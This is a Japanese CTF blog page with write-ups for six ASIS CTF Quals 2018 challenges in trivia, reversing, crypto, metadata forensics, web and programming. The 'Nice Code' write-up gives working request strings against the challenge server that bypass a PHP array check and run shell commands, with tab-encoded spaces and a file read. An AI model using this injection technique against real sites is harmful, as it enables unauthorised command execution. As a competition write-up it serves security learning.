CTF日本語サイト

ASIS CTF Quals 2018

2018年05月04日18:28

ASIS CTF Quals 2018 writeup Welcome

カテゴリ
ASIS CTF Quals 2018

Welcome

Category
Trivia


Description:

Welcome to ASISCTF.

提示されたリンクはTwitterへのリンクです。次のツイートにフラグが記載されています。
フラグは、
ASIS{Welcome_to_ASISCTF_Let's_increase_the_world's_entropy}
です。

デジタル時代の基礎知識『SNSマーケティング』 「つながり」と「共感」で利益を生み出す新しいルール(MarkeZine BOOKS)
デジタル時代の基礎知識『SNSマーケティング』 「つながり」と「共感」で利益を生み出す新しいルール(MarkeZine BOOKS) [単行本(ソフトカバー)]
林 雅之
翔泳社
2018-02-23


タグ :
#Trivia
このエントリーをはてなブックマークに追加
2018年05月04日18:18

ASIS CTF Quals 2018 writeup Warm up

カテゴリ
ASIS CTF Quals 2018

Warm up

    Category
Reverse

Description:

Must-Have Pre-Workout Warm up Challenge.

提示されたファイルを解凍すると次のようなCソースファイルができます。
#define M 37
#define q (2+M/M)
#define v (q/q)
#define ef ((v+q)/2)
#define f (q-v-ef)
#define k (8-ef)
struct b{int64_t y[13];}S;int m=1811939329,N=1,t[1<<26]={2},a,*p,i,e=73421233,s,c,U=1;g(d,h){for(i=s;i<1<<25;i*=2)d=d*1LL*d%m;for(p=t;p<t+N;p+=s)for(i=s,c=1;i;i--)a=p[s]*(h?c:1LL)%m,p[s]=(m*1U+*p-a)*(h?1LL:c)%m,*p=(a*1U+*p)%m,p++,c=c*1LL*d%m;}l(){while(e/=2){N*=2;U=U*1LL*(m+1)/2%m;for(s=N;s/=2;)g(136,0);for(p=t;p<t+N;p++)*p=*p*1LL**p%m*U%m;for(s=1;s<N;s*=2)g(839354248,1);for(a=0,p=t;p<t+N;)a+=*p<<(e&1),*p++=a%10,a/=10;}}z(n){int y=3,j,c;for(j=2;j<=n;){l();for(c=2;c<=y-1;c++){l();if(y%c==0)break;}if(c==y){l();j++;}y++;}l();return y-1;}main(a, pq) char* pq;{int b=sizeof(S),y=b,j=M;l();int x[M]={b-M-sizeof((short int) a),(b>>v)+(k<<v)+ (v<<(q|ef)) + z(v+(ef<<v)),(z(k*ef)<<v)-pow(ef,f), z(( (j-ef*k)|(ef<<k>>v)/k-ef<<v)-ef),(((y+M)&b)<<(k/q+ef))-z(ef+v),((ef<<k)-v)&y,y*v+v,(ef<<(q*ef-v-(k>>ef)))*q-v,(f<<q)|(ef<<(q*f+k))-j+k,(z(z(z(z(z(v)))))*q)&(((j/q)-(ef<<v))<<q)|(j+(q|(ef<<v))),y|(q+v),(ef<<ef)-v+ef*(((j>>ef)|j)-v+ef-q+v),(z(j&(b<<ef))&(z(v<<v)<<k))-(q<<v)-q,(k<<q)+q,(z(y)>>(ef<<v))+(z(k+v))-q,(z(z(k&ef|j))&b|ef|v<<f<<q<<v&ef>>k|q<<ef<<v|k|q)+z(v<<v)+v,(ef>>v)*q*z(k-v)+z(ef<<ef&q|k)+ef,z(k<<k)&v&k|y+k-v,z(f>>ef|k>>ef|v|k)*(ef>>v)*q,(ef<<k-ef<<v>>q<<ef*ef)-j+(ef<<v),z(ef*k)*z(v<<v)+k-v,z((z(k)<<z(v)))&y|k|v,z(ef<<ef<<v<<v)/ef+z(v<<ef|k|(b>>q)&y-f)-(ef<<q)+(k-v)-ef,k<<(ef+q)/z(ef)*z(q)&z(k<<k)|v,((z(y|j>>k*ef))%ef<<z(v<<v<<v)>>q<<q|j)/ef+v,(j-ef<<ef<<v*z(v>>v<<v)>>ef)/ef%z(k<<j)+q,z(k-v)+k|z(ef<<k>>v<<f)-z(q<<q)*ef>>v,(z(ef|y&j|k)%q|j+ef<<z(k|ef)%k<<q|ef|k<<ef<<q/ef|y/ef+j>>q)&k<<j|ef+v,84,z(v*ef<<ef<<q)*q%ef<<k|k|q-v,((z(20)*v)|(f>>q)|(k<<k))/ef-(ef<<(v*q+ef))-(k<<q)+z(k)-q};while(j--){putchar(x[M-v-j]);}printf(" From ASIS With Love <3\n");return 0;}
ファイルの冒頭に以下のincludeを追加して、ファイル名をwarmup.cに変更します。
#include <stdint.h>
#include <stdio.h>
gccでコンパイルします。
$ gcc warmup.c
できた実行ファイルを実行します。少し時間がかかりますが次のように結果が出力されます。
$ ./a.out
ASIS{hi_all_w31c0m3_to_ASISCTF} From ASIS With Love <3
フラグは、
ASIS{hi_all_w31c0m3_to_ASISCTF}
です。

苦しんで覚えるC言語
苦しんで覚えるC言語 [単行本]
MMGames
秀和システム
2011-06-24


タグ :
#Reverse
このエントリーをはてなブックマークに追加
2018年05月04日18:09

ASIS CTF Quals 2018 writeup The Early School

カテゴリ
ASIS CTF Quals 2018

The Early School

    Category
Crypto

Description:

Welcome to ASIS Early School.

提示されたファイルを解凍すると、暗号化されたファイルと次のようなPythonのソースファイルができます。
#!/usr/bin/python

from Crypto.Util.number import *
from flag import FLAG, round

def encrypt(msg):
    assert set(msg) == set(['0', '1'])
    enc = [msg[i:i+2] + str(int(msg[i]) ^ int(msg[min(i+1, len(msg)-1)])) for i in range(0, len(msg), 2)]
    return ''.join(enc)

ENC = bin(bytes_to_long(FLAG))[2:]

for _ in xrange(round):
    ENC = encrypt(ENC)

fp = open('FLAG.enc', 'w')
fp.write(long_to_bytes(int(ENC, 2)))
fp.close()
このPythonプログラムの処理の内容は次のようなものです。
  1. FLAG文字列を2進数の文字コードで表す。
  2. それをencrypt関数に渡して暗号化する操作をround回行う。
  3. encrypt関数では渡された2進文字列を先頭から2文字ずつ処理を行う。
  4. その2文字を1文字に分けてそのXORを取った結果を連結して3文字の文字列にする。
  5. 2文字ずつ処理を行う際、最後に1文字だけ残った場合はその1文字どおしのXORを取った結果(つまり0)を連結した2文字になる。
  6. それらを連結した結果をencrypt関数の戻り値とする。
具体的な例で確認すると、元のデータが'A'という文字列とすると、まず2進数文字列で表した1000001
をencrypt関数に渡します。2文字ずつ処理するので、10 00 00 1に分割して処理します。XORを取った結果を付加するので、101 000 000 10になります。

したがって、この暗号を復号するdecrypt関数は、次のような処理になります。
  1. 2進文字列を3文字ずつ区切って処理をする。
  2. 3文字目は不要なので切り捨てて2文字だけを残す。
  3. 最後が2文字になったときは、2文字目は不要で、1文字目だけ残す。
  4. 残したものを連結したものが復号結果となる。
roundの値は分からないので、decryptを繰り返し、先頭がフラグ形式のA=1000001になった時点でデータを表示するようにしてみます。
#!/usr/bin/python

from Crypto.Util.number import *

def decrypt(enc):
    msg = [enc[i:min(i+2, len(enc)-1)] for i in range(0, len(enc), 3)]
    return ''.join(msg)

fp = open('FLAG.enc', 'r')
FLAG = fp.read()
fp.close()

ENC = bin(bytes_to_long(FLAG))[2:]

i = 1
while True:
    ENC = decrypt(ENC)
    print(i)
    if ENC.startswith('1000001'):
        print(long_to_bytes(int(ENC, 2)))
        break
    i += 1
実行すると次のような結果となります。
$ python2 bbb.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
ASIS{50_S1mPl3_CryptO__4__warmup____}
19回繰り返したところでフラグを得ることができました。
フラグは、
ASIS{50_S1mPl3_CryptO__4__warmup____}
です。

現代暗号入門 いかにして秘密は守られるのか (ブルーバックス)
現代暗号入門 いかにして秘密は守られるのか (ブルーバックス) [新書]
神永 正博
講談社
2017-10-18


タグ :
#Crypto
このエントリーをはてなブックマークに追加
2018年05月04日17:40

ASIS CTF Quals 2018 writeup Plastic

カテゴリ
ASIS CTF Quals 2018

Plastic

Category
Misc


Description:

Are LaTeX and PlAsTiC the Same? It seems that they have very different compounds.

提示されたファイルを解凍するとpngファイルができます。
$ file plastic
plastic: PNG image data, 1612 x 74, 8-bit/color RGBA, non-interlaced
pngファイル中に以下の文字列があります。
<rdf:li xml:lang="x-default">AAAFWHjabVRfbBRFGJ/ZOeifa+m2hVJaoNf2iohQtndX9ipS29IeVuwVe/1zbfc4&#xA;5/bm7pbu7V5255DjaDISozExaggxSIxC+2KRqBhjCPFBQwgmPggtSnySFx98IP57&#xA;ML4590dEw2w2+33fzHzz+37fbyeW0TWbStIdKCDHuvUvngi7jxPL1kwj7DZjx4hK&#xA;7Vk3ttSUxsOTbmpmGgB85cLHYntFZXtHp7trx2M7H9/1RI+/78DgoWeC4zNhJarG&#xA;U7pp0ym3kdX1tapqZ02TayYY6l4gOXuOf8t5p92qjm17pXZDnVjf0LhxExMYYg62&#xA;jq1nFaySVbHqlc3NW1pat27b3sacrIZtYHWsnrWwVraNbWeucAzbRNcMMqWaumlN&#xA;ps04maIa1Uk4YxGcjukkksZJQ0toKqa8pMk4piQq1sWwupC0zKwRP1jYOGebWUsl&#xA;k+QE7QTlsbZ7j7N7rzQVDE0cGlKCoeLCUAarZFzcJXX3+fd5fL19/j6/S+qWJLnH&#xA;I/XxIXsLrkf2eX0Sj/YCEbLaVY/X1ztXKtbAaRIumcSeKadd2if/Y4aDofEiO6Jj&#xA;1fnk/qdmOV02tTQjycQjPFH/0xx+MDSWpZhXFyrOLPcPyHxfyVkbch4cHgk88Dn0&#xA;QcqtWJYSmzWwLawxKq4qcVPNpolBi0jme6QMjeSxRTVVJ4vVStYmvNIFnCTz3Cxg&#xA;tiP5IseLri4eibsSpsVfg7qK0Yd35HHatnPpGF+ZxjRl/3+uEHzU3HyWJvyRvGZk&#xA;OFJDLR2UyOouarpoLkNccc3ivOg5bmDV0jhWl5rCFlYp12t1QWajh8cuPss2XnyO&#xA;bWLN08FQgAO8c+T5CWdocmqa+yHtJOHEJAI6TtrcD/LCOgd2lhouiqyJbZ4eMw2s&#xA;mpzp2blyhqV5uWzxaOQoJ3RYUwtqwlZuKSLz4As4KjY8xHO8RP1STH5kvHNgqHTk&#xA;KnEmkoUfg2ocyOCXfrLwp/oT28pTasf4mcNcrUsLctkqKDK9Vwr0uPgDWG2h05mR&#xA;AGsr9fRAXoklXIOh0dCiku+V0l4l6stkbCWa7R1RomNeGXPx+5RofNyQlehonyFN&#xA;ECVKU96x9nZlkR+ZPR4VGx9I698al7MRuSi6wyRH4oPlq+B27uSkZZqUQVAJ6kEL&#xA;6AR7gAfIYB5gkAIZkAenwevgDfAWOAPOgrfBOXAevAveAx+AS+Ay+Ah8Aj4Fn4HP&#xA;wVVwDXwBboBvwC3wPfgR3Ae/Qwesg82wDXZBD4xCDFWYgjY8BV+Gr8I34Tl4Hr4P&#xA;V+CH8DK8Aq/Dm/AWvAvvwfvwF/gb/EP4WvhWuC2sCd8Jd4UfhHvCz8Kvwl8IoCrk&#xA;RLWoDjWhVtSButBu1IP60SAKoHl0FNnoFHoJvYbOoLPoHXQBLaNL6Aq6iq6hr9B1&#xA;dAPddFQ4ahwdjh0Ov2O/Y6DUQQGWr4s8+M9wDP0NfUGwlA==&#xA;</rdf:li>
取り出して&#xA;を改行に置き換えると、次にようになります。
AAAFWHjabVRfbBRFGJ/ZOeifa+m2hVJaoNf2iohQtndX9ipS29IeVuwVe/1zbfc4
5/bm7pbu7V5255DjaDISozExaggxSIxC+2KRqBhjCPFBQwgmPggtSnySFx98IP57
ML4590dEw2w2+33fzHzz+37fbyeW0TWbStIdKCDHuvUvngi7jxPL1kwj7DZjx4hK
7Vk3ttSUxsOTbmpmGgB85cLHYntFZXtHp7trx2M7H9/1RI+/78DgoWeC4zNhJarG
U7pp0ym3kdX1tapqZ02TayYY6l4gOXuOf8t5p92qjm17pXZDnVjf0LhxExMYYg62
jq1nFaySVbHqlc3NW1pat27b3sacrIZtYHWsnrWwVraNbWeucAzbRNcMMqWaumlN
ps04maIa1Uk4YxGcjukkksZJQ0toKqa8pMk4piQq1sWwupC0zKwRP1jYOGebWUsl
k+QE7QTlsbZ7j7N7rzQVDE0cGlKCoeLCUAarZFzcJXX3+fd5fL19/j6/S+qWJLnH
I/XxIXsLrkf2eX0Sj/YCEbLaVY/X1ztXKtbAaRIumcSeKadd2if/Y4aDofEiO6Jj
1fnk/qdmOV02tTQjycQjPFH/0xx+MDSWpZhXFyrOLPcPyHxfyVkbch4cHgk88Dn0
QcqtWJYSmzWwLawxKq4qcVPNpolBi0jme6QMjeSxRTVVJ4vVStYmvNIFnCTz3Cxg
tiP5IseLri4eibsSpsVfg7qK0Yd35HHatnPpGF+ZxjRl/3+uEHzU3HyWJvyRvGZk
OFJDLR2UyOouarpoLkNccc3ivOg5bmDV0jhWl5rCFlYp12t1QWajh8cuPss2XnyO
bWLN08FQgAO8c+T5CWdocmqa+yHtJOHEJAI6TtrcD/LCOgd2lhouiqyJbZ4eMw2s
mpzp2blyhqV5uWzxaOQoJ3RYUwtqwlZuKSLz4As4KjY8xHO8RP1STH5kvHNgqHTk
KnEmkoUfg2ocyOCXfrLwp/oT28pTasf4mcNcrUsLctkqKDK9Vwr0uPgDWG2h05mR
AGsr9fRAXoklXIOh0dCiku+V0l4l6stkbCWa7R1RomNeGXPx+5RofNyQlehonyFN
ECVKU96x9nZlkR+ZPR4VGx9I698al7MRuSi6wyRH4oPlq+B27uSkZZqUQVAJ6kEL
6AR7gAfIYB5gkAIZkAenwevgDfAWOAPOgrfBOXAevAveAx+AS+Ay+Ah8Aj4Fn4HP
wVVwDXwBboBvwC3wPfgR3Ae/Qwesg82wDXZBD4xCDFWYgjY8BV+Gr8I34Tl4Hr4P
V+CH8DK8Aq/Dm/AWvAvvwfvwF/gb/EP4WvhWuC2sCd8Jd4UfhHvCz8Kvwl8IoCrk
RLWoDjWhVtSButBu1IP60SAKoHl0FNnoFHoJvYbOoLPoHXQBLaNL6Aq6iq6hr9B1
dAPddFQ4ahwdjh0Ov2O/Y6DUQQGWr4s8+M9wDP0NfUGwlA==
これをbase64でデコードし、できたファイルをbinwalkで確認します。
$ binwalk -a aaa.bin
DECIMAL    HEX        DESCRIPTION
-------------------------------------------------------------------------------------------------------
4          0x4        zlib compressed data
4バイト目からzlib compressed dataが存在していることが分かります。これを抽出、解凍するPythonプログラムを作成します。
import zlib

f = open('aaa.bin', 'rb')
dummy = f.read(0x04)
data = f.read()
f.close()

dc = zlib.decompress(data)

f = open('bbb', 'wb')
f.write(dc)
f.close()
実行してできたファイルをfileコマンドで確認します。
$ file bbb
bbb: Apple binary property list
stringsコマンドで確認します。
$ strings bbb
(略)
={\bf ASIS}\{50m3\_4pps\_u5E\_M37adat4\_dOn7\_I9n0Re\_th3M!!\}
23uv_
NSMutableDictionary
u]7_
NSKeyedArchiver
yzTroot
フラグは、
ASIS{50m3_4pps_u5E_M37adat4_dOn7_I9n0Re_th3M!!}
です。

macOS High Sierra パーフェクトマニュアル
macOS High Sierra パーフェクトマニュアル [単行本]
井村克也
ソーテック社
2017-10-21


タグ :
#Misc
このエントリーをはてなブックマークに追加
2018年05月04日16:12

ASIS CTF Quals 2018 writeup Nice Code

カテゴリ
ASIS CTF Quals 2018

Nice Code



Category
Web


Description:

Beautify php code! Here

問題に提示されているリンクをクリックすると次のページが表示されます。

1

さらにGET STARTEDのボタンをクリックすると、http://167.99.36.112:8080/admin/?というURLへ遷移し、次のような文字列が表示されます。

2

次にhttp://167.99.36.112:8080/admin/を表示してみます。URLの最後が/index.phpでなければならないようです。

3

それでは、http://167.99.36.112:8080/admin/index.phpにアクセスしてみます。次の文字列が表示されます。/index.phpで終わるが、/admin/index.phpではダメなようです。

4

いろいろ試してみると、http://167.99.36.112:8080/admin/index.php/index.phpにアクセスすると、次のページが表示されました。

5

Click hereのリンクはhttp://167.99.36.112:8080/another/index.php?sourceへのリンクになっており、クリックすると、次のようにphpのソースが表示されます。パラメータをうまく送信することでshellを実行することができるようです。
<?php
include('oshit.php');
$g_s = ['admin','oloco'];
$__ni = $_POST['b'];
$_p = 1;
if(isset($_GET['source'])){
    highlight_file(__FILE__);
        exit;
}
if($__ni === $g_s & $__ni[0] != 'admin'){
    $__dgi = $_GET['x'];
    $__dfi = $_GET;
    foreach($__dfi as $_k_o => $_v){
        if($_k_o == $k_Jk){
            $f = 1;
        }
        if($f && strlen($__dgi)>17 && $_p == 3){
            $k_Jk($_v,$_k_o); //my shell :)
        }
        $_p++;
    }
}else{    
    echo "noob!";
}
まず、POSTでパラメータbを配列の形で’admin’と’oloco’の2つ送信する必要がありますが、0番目が’admin’ではダメなので、PHPのバグを利用して次のように送信してみます。2^32=4294967296です。これは配列での比較(===)では一致(True)となりますが、配列の0番目の要素にアクセスすると初期化されていないことになります。
b[4294967296]=admin&b[1]=oloco
Fiddlerで[Replay]-[Reissue and Edit]を使用して、次にようにリクエストを送信します。

6

レスポンスを確認すると、noob!という文字列が出力されませんのでパラメータbのチェックは通ったようです。

7

次のチェックですが、GETパラメータが以下のような条件を満たす必要があるようです。
  • xが17文字より長い 
  • 関数との比較が一致(==)しなければならない
  • 3つ目のパラメータのときにshellが実行される
  • 3つ目のパラメータの名前にコマンド、値にパラメータを指定する
関数との比較を通すために2つ目のパラメータに0を指定します。したがって、次のようなパラメータでうまくいくか試してみます。
?x=123456789012345678&0=0&ls=system
Fiddlerで次のようにリクエストを送信してみます。

8

次のようにlsコマンドの結果が返ってきます。

9

さて次に各ディレクトリの中をlsコマンドで見てみたいと思いますが、ls /varにようにスペースは使用することができません。そこでタブ(%09)を使用して次のようにリクエストを送信します。
?x=123456789012345678&0=0&ls%09/var=system
すると次のように結果が返ってきました。
backups
cache
flag
lib
local
lock
log
mail
opt
run
spool
tmp
www
flagファイルがありますので、catコマンドでファイルの中を見てみたいと思います。次のようにリクエストを送信します。
?x=123456789012345678&0=0&cat%09/var/flag=system
フラグが表示されました。
ASIS{f52c5a0cf980887bdac6ccaebac0e8428bfb8b83}
フラグは、
ASIS{f52c5a0cf980887bdac6ccaebac0e8428bfb8b83}
です。

初めてのPHP5 増補改訂版
初めてのPHP5 増補改訂版 [大型本]
David Sklar
オライリージャパン
2012-09-24


タグ :
#Web
このエントリーをはてなブックマークに追加
2018年05月04日00:37

ASIS CTF Quals 2018 writeup Neighbour

カテゴリ
ASIS CTF Quals 2018

Neighbour 

Category
PPC


Description:

For a given large integer n, find the nearest perfect power that is equal or smaller than n.

nc 37.139.22.174 11740

提示されたサーバに接続すると、まず最初にsha256ハッシュ値の下6桁に一致する文字列の入力を求められます。これはランダムな文字列を繰り返し生成しそのsha256ハッシュ値の下6桁を比較して文字列を求めます。
それをクリアすると本題になります。与えられた大きな整数値(n)に対して、それを超えない最大の累乗数(xのy乗で表される数)を見つけて、n-x**yの値を答えるというものです。
この課題を解くPythonプログラムを下記します。
import socket
import sys
import string
import random
import hashlib
import math

###########################
def hash_test(hash):
n = 5
while True:
random_str = ''.join([random.choice(string.ascii_letters + string.digits + string.punctuation) for i in range(n)])
if hash == hashlib.sha256(random_str).hexdigest()[-6:]:
return random_str

def nroot(n, k):
    x = 2 ** int(math.ceil(math.log(n, 2)/k))
    y = ((k-1)*x + n / x ** (k-1)) / k
    while y < x:
        x = y
        y = ((k-1)*x + n / x ** (k-1)) / k
    return x

def solve(n):
    r = float('inf')
    y = 2
    while True:
        x = nroot(n, y)
        m = n - x ** y
        if r > m:
            r = m
        if x == 2:
            break
        y += 1
    return r

host = '37.139.22.174'
if len(sys.argv) > 1:
    host = sys.argv[1]
port = 11740
if len(sys.argv) > 2:
    host = int(sys.argv[2])
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))

client_file = client.makefile('b')

while True:
    s = client_file.readline().strip()
    print(s)
    if 'Submit a printable string X, such that sha256(X)[-6:]' in s:
        break

hash = s.split()[9]
a = hash_test(hash)
print(a)
client_file.write(a + "\n")
client_file.flush()

while True:
    while True:
        s = client_file.readline().strip()
        print(s)
        if s.startswith('n = '):
            break
        elif 'ASIS{' in s:
            sys.exit()
    n = int(s.split()[2])

    while True:
        s = client_file.readline().strip()
        print(s)
        if 'To win the flag, submit r :)' in s:
            break

    r = solve(n)
    print(r)
    client_file.write(str(r) + "\n")
    client_file.flush()
実行すると、うまくフラグを取得することができました。
>ccc.py
*****************************************************************************
| Welcome to the Near Neighbor Problem, only mathematicians know the flag!! |
| Your mission is to find smallest natural number r for given n, such that  |
| there exist integers x, y: n - x**y = r > 0, x > 1 and y > 1. good luck!! |
*****************************************************************************
Submit a printable string X, such that sha256(X)[-6:] = fb18dd
i1++(
Please be patient ...
It takes a few seconds to load ...
n = 42713653694583983917620633592482448293294093258667415643252682236167888288964999713885812047533602109960168082130810948514035606387087967935594322305474125977354110862303478451015550305544814896711627803736665360621081230492228907432486729823918397977491607816749292910570447379496441921865495916775310468527140030451083906354541516728225151616776547670010327038887765396600316566279294093701940815771548023557472233154394104045165112075492632295386261916504936672258184211757240396922852248405647272131238621214104903342821311907655510975811492771148217955616721879060175182912822690333624279243631263938197402278898713444374965478809525154324961291401697549189065199114170246756531312184508886269455303476883915075611954490200843557161122839278006298154207231707901194058849003875281067527059480661749386360293897767533477457119541287157895459572460126976224384416438750189871295788
To win the flag, submit r :)
4459606347895459572460126976224384416438750189871295788
Great! :) please pass the next stage :P
n = 924257951149882570317917711254673494448840369977224014381744199905788559823867115663520627473666
To win the flag, submit r :)
3623664227916706834366291295490
Great! :) please pass the next stage :P
n = 65479758012639802017637216949111190165775936308342951533429010383261508472997822758685306430423975715111257497850480690866939487548033779052220523490514490329325080907105034355378449479535504299026482146500942630540193926289616449335261298177869552294913541025074865786996895579458195472000858373211577122436897518360407589533429207756672693902458310229293285183047704068948226937369541524699815867986295192206591734728
To win the flag, submit r :)
166861975878844103
Great! :) please pass the next stage :P
n = 217767580286127017190145533588803219848286319785898002433687115334542020630900969886690141088296477253939369853296204945210719758876534662130978363080440623651560881192412296228443096503146937981533578909952628891621309547725977275218874177043267826828489126765819157664677814456120164453469156088499304205808558888507588613388971418094024635697007295411179752293456625759040682154026255906740801237720603078057762603849512862407652271059275090405605732274437010097949054986308333152879473562023994660452792100586673285019917529657242954558167519493373896387016422341395137695658959561368034439773888289999650713891464374990076436137303569130110298599113198112321996084377399816203845185168347145130320696047287365519994784995399187688665609440580895
To win the flag, submit r :)
8916891587871
Great! :) please pass the next stage :P
n = 284477657175020238466381705031890624059673697588531438615565748803397181660936153169604142697233704020337293792389094466850509988785581342482327916496783450987401360133222989546392641321734053647396552981571037168040752960602672269153138323875514116268145661695528626712731506962302694526736493218673715635157039166099513109345713963313619841316821792046713238054614031786159100854417186292494885247825323939639455587574728838157238413485822299833654446753880023610472347460605439900723468985557266609763729082722418880788208670600558583226837174354207604141787526553596859305997349949585312204722374969479693811452708735044950986335035368318090725293608603307710688150869214554988100461797667329927214643249930342991669272013622239738135130670361980031485000118982755276270302407149965513820460060374000054480175477038831701074201584241548698111938843837240054225023331609638536054564498344867098347471634432000000000000000000000000000000000000433930856920505
To win the flag, submit r :)
433930856920505
Great! :) please pass the next stage :P
n = 446812435463188228108507290517210934738976598075494463136252007658339499637332994778105048922921464416669623002960271938850251682688764630788078036374647127041150118095011245893717827001755139199539421256770251068054732628742653464707162470860867744644963513881626379295384868112521047478164340907648529396784829200044931951797398703223901613276374685005024596744539519881478197603392118613248423434290147783738349455206600361135767097728253899859300673023101217851592046508565998569554335284385533874213142078824927083941413815942201397168667551490343064477047456055738161122065405487954242757780650044346388918733082125581709373617193766794064656980908086996490008873091220888652781460009349617883870799390034720209402298176335296187821878769164995809396380376506331
To win the flag, submit r :)
8155
Great! :) please pass the next stage :P
n = 75216526271596365311583689648476617619334557709224915570712662525413220141371045989999405989638228739411340436002271022400381247452009561000639974705495587182612529351777097717361894152365141347947250740885976606619478983476894623670299192399177180129716452337872279277598532821198928032602650079360700842927323509917702246762441979641574097063576416656904964301927680248490944387995994161003221722158747368504184217682101852081020960491331222922857528086820561255265746827308708839025258945938509508169437710750389834308817065020082336679152444103349536529931359395079539701071935487151259384813056171879879517555672615959928424713596005783112836962659196492152031673232254654110625437249926218021974082625255380287031635856724897574407894876655832486245531944725225027594374293445689098205172530618340893154960824093925444630397011473557590448532064215621285079950285175
To win the flag, submit r :)
14
Great! :) please pass the next stage :P
n = 109663082557579957314455694977075611015747884106290102778850729721710104575094274235324451060911421761717718331882413733885744274850343420878696081584048247181046214892315391606024003354786054662249377678632586577713056745701166607529498278345746579790851739703298387607506170435901824582475185779036675531391240140276085855139067540648819178387
To win the flag, submit r :)
7423632694594406092782500625819012
Great! :) please pass the next stage :P
n = 588334255385556920933603368744437635265552701720661258181825549814157440887345039407764275447466968183792287805809886150808408670153932189299948446865649979103881307697092813707353891553936938800140371900425849458878165771292883754962173243336747771852533608966976979620999325399635100997728258626366044918508026114368427978354348607215753097906228006150869712874898919395624788577025895176028307988564456950422766256767359709154322320201484616292290537063841343690354024677937559124697194001925444305912835725670824029454310472193179621455267997047394594823746983176081674614834267106682520365722985390190882680831944374203461420959
To win the flag, submit r :)
7226762933174749005610338152233594024239337246
Great! :) please pass the next stage :P
n = 7679142641166565255095917848871911626457133586193968174930409925402706618434369752551165389517671470946020800744029131427767708161978734834769623349707042659147947364828123196767828464614045195803256968221340008975313967931131264963933022531035872220497783722670222475580564279044798495468640657259776902332702844388231289951144765623188840737110169116991493382496139979875863789945583293687288532942884251537481724446324204868067194057717835331654512731795253400395738977160030813543111687201120043
To win the flag, submit r :)
405542619814120497659187307652485433201479685770049178122950
Congratz! :) You got the flag: ASIS{36812f76cce2753e482ac6f68f9d3012}
フラグは、
ASIS{36812f76cce2753e482ac6f68f9d3012}
タグ :
#PPC
このエントリーをはてなブックマークに追加
記事検索
ギャラリー
  • TetCTF 2023 NewYearBot
  • UUT CTF writeup Find The Password
  • UUT CTF writeup The Puzzle
  • Hack Zone Tunisia 2019 writeup Microscope
  • Hack Zone Tunisia 2019 writeup Welcome
  • SwampCTF 2019 writeup Brokerboard
  • SwampCTF 2019 writeup Leap of Faith
  • SwampCTF 2019 writeup Last Transmission
  • CBM CTF 2019 writeup Long road
タグクラウド
最新記事
Incognito 4.0 Meow
DiceCTF 2023 recursive-csp
DiceCTF 2023 Provably Secure
Insomni'hack teaser 2023 Welcome
Real World CTF 5th 0KPR00F
idekCTF 2022 Typop
ASIS CTF Finals 2022 Vindica
TetCTF 2023 Image Services Viewer
TetCTF 2023 shuffle128
TetCTF 2023 NewYearBot
カテゴリー
ASIS CTF Quals 2014 (2)
WhiteHat Contest 10 (1)
HITCON CTF 2015 Quals (1)
Hackover CTF 2015 (2)
RCTF 2015 Quals (3)
Hack Dat Kiwi 2015 (3)
SECCON 2015 Online CTF (6)
9447 Security Society CTF 2015 (2)
Defcamp CTF Qualification 2015 (2)
32C3 CTF (1)
Trend Micro CTF Asia Pacific & Japan 2015 Online Qualifier (4)
CSAW CTF Qualification Round 2015 (3)
Insomni'hack teaser 2016 (2)
Break In 2016 (3)
HackIM 2016 (3)
Sharif University CTF 2016 (8)
Internetwache CTF 2016 (10)
SSCTF 2016 Quals (2)
Boston Key Party CTF 2016 (2)
0CTF 2016 Quals (1)
Sunshine CTF 2016 (2)
Codegate CTF 2016 Quals (2)
BCTF 2016 (3)
VolgaCTF 2016 Quals (1)
Pwn2Win CTF 2016 (4)
Securinets CTF Quals 2016 (2)
Nuit du Hack CTF Quals 2016 (4)
sCTF 2016 Q1 (8)
PlaidCTF 2016 (5)
Google Capture The Flag 2016 (6)
ASIS CTF Quals 2016 (2)
TU CTF 2016 (9)
DEF CON CTF Qualifier 2016 (2)
ALICTF 2016 (1)
BackdoorCTF 2016 (3)
IceCTF 2016 (1)
CSAW CTF Qualification Round 2016 (4)
HITCON CTF 2016 Quals (4)
EKOPARTY CTF 2016 (5)
Hack The Vote 2016 (5)
SharifCTF 7 (2)
BSides San Francisco CTF (9)
Securinets CTF Quals 2017 (2)
Teaser CONFidence CTF 2017 (1)
Insigne CTF (2)
PlaidCTF 2017 (4)
angstromCTF 2017 (2)
DEF CON CTF Qualifier 2017 (1)
CTFZone 2017 (2)
SHA2017 CTF (3)
HackIT CTF 2017 (1)
EKOPARTY CTF 2017 (1)
CSAW CTF Qualification Round 2017 (1)
Hack Dat Kiwi 2017 (1)
Pwn2Win CTF 2017 (3)
RC3 CTF 2017 (1)
WhiteHat Grand Prix 2017 (2)
InCTF (4)
34C3 CTF (2)
Break In CTF 2018 (2)
Harekaze CTF 2018 (1)
Pragyan CTF 2018 (4)
STEM CTF: Cyber Challenge 2018 (6)
*ctf 2018 (1)
NoNameCon CTF Quals 2018 (1)
ASIS CTF Quals 2018 (6)
PlaidCTF 2018 (1)
35C3 CTF (1)
FireShell CTF 2019 (4)
Evlz CTF (1)
Quals: Saudi and Oman National Cyber Security CTF (7)
STEM CTF: Cyber Challenge 2019 (3)
TAMUctf 19 (20)
BSidesSF 2019 CTF (2)
Aero CTF 2019 (4)
Pragyan CTF 2019 (4)
UTCTF (4)
Teaser CONFidence CTF 2019 (3)
0CTF/TCTF 2019 Quals (1)
Securinets CTF Quals 2019 (4)
b00t2root '19 (2)
VolgaCTF 2019 Qualifier (1)
RADARCTF (4)
Midnight Sun CTF 2019 Quals (2)
AceBear Security Contest 2019 (2)
SpamAndFlags Teaser 2019 (1)
SwampCTF 2019 (5)
CBM CTF 2019 (3)
Byte Bandits CTF 2019 (2)
PlaidCTF 2019 (1)
Hack Zone Tunisia 2019 (3)
YauzaCTF 2019 Quals (1)
TG:Hack (6)
ASIS CTF Quals 2019 (2)
ångstromCTF 2019 (9)
UUT CTF (8)
*CTF 2019 (1)
TetCTF 2023 (4)
ASIS CTF Finals 2022 (1)
Real World CTF 5th (1)
idekCTF 2022 (1)
Insomni'hack teaser 2023 (1)
DiceCTF 2023 (2)
Incognito 4.0 (1)